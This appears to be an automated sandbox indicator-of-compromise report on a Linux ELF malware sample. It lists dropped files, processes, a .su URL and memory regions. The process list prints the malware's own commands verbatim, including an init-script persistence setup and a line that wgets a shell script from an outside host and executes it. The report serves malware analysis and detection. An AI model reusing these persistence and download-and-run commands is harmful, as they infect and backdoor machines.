IOC Report
x86_64.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
x86_64.nn.elf
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
initial sample
 malicious
/etc/init.d/mybinary
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/x86_64.nn.elf
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/profile
ASCII text
dropped
 malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
 malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/tmp/x86_64.nn.elf
/tmp/x86_64.nn.elf
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mybinary
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/x86_64.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting x86_64.nn.elf'\n /tmp/x86_64.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping x86_64.nn.elf'\n killall x86_64.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/x86_64.nn.elf"
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/x86_64.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/x86_64.nn.elf
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/x86_64.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/tmp/x86_64.nn.elf
-
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
There are 38 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pen.gorillafirewall.su/lol.sh
unknown
http://pen.gorillafirewall.su/
unknown

Memdumps

Base Address
Regiontype
Protect
Malicious
413000
page execute read
 malicious
413000
page execute read
 malicious
413000
page execute read
 malicious
413000
page execute read
 malicious
413000
page execute read
 malicious
413000
page execute read
 malicious
413000
page execute read
 malicious
413000
page execute read
 malicious
413000
page execute read
 malicious
413000
page execute read
 malicious
413000
page execute read
 malicious
7ffd4fb28000
page read and write
7ffd4fb84000
page execute read
514000
page read and write
516000
page read and write
516000
page read and write
514000
page read and write
7ffd4fb84000
page execute read
1854000
page read and write
516000
page read and write
514000
page read and write
7ffd4fb28000
page read and write
7ffd4fb84000
page execute read
7ffd4fb84000
page execute read
516000
page read and write
514000
page read and write
514000
page read and write
7ffd4fb84000
page execute read
7ffd4fb84000
page execute read
1854000
page read and write
1854000
page read and write
7ffd4fb28000
page read and write
1854000
page read and write
514000
page read and write
1854000
page read and write
1854000
page read and write
7ffd4fb28000
page read and write
7ffd4fb28000
page read and write
1854000
page read and write
516000
page read and write
1864000
page read and write
514000
page read and write
1854000
page read and write
7ffd4fb28000
page read and write
516000
page read and write
516000
page read and write
514000
page read and write
516000
page read and write
1864000
page read and write
1854000
page read and write
1864000
page read and write
7ffd4fb28000
page read and write
516000
page read and write
7ffd4fb84000
page execute read
7ffd4fb28000
page read and write
7ffd4fb84000
page execute read
7ffd4fb84000
page execute read
7ffd4fb84000
page execute read
516000
page read and write
1854000
page read and write
7ffd4fb84000
page execute read
7ffd4fb28000
page read and write
516000
page read and write
514000
page read and write
7ffd4fb28000
page read and write
7ffd4fb28000
page read and write
1854000
page read and write
514000
page read and write
514000
page read and write
There are 59 hidden memdumps, click here to show them.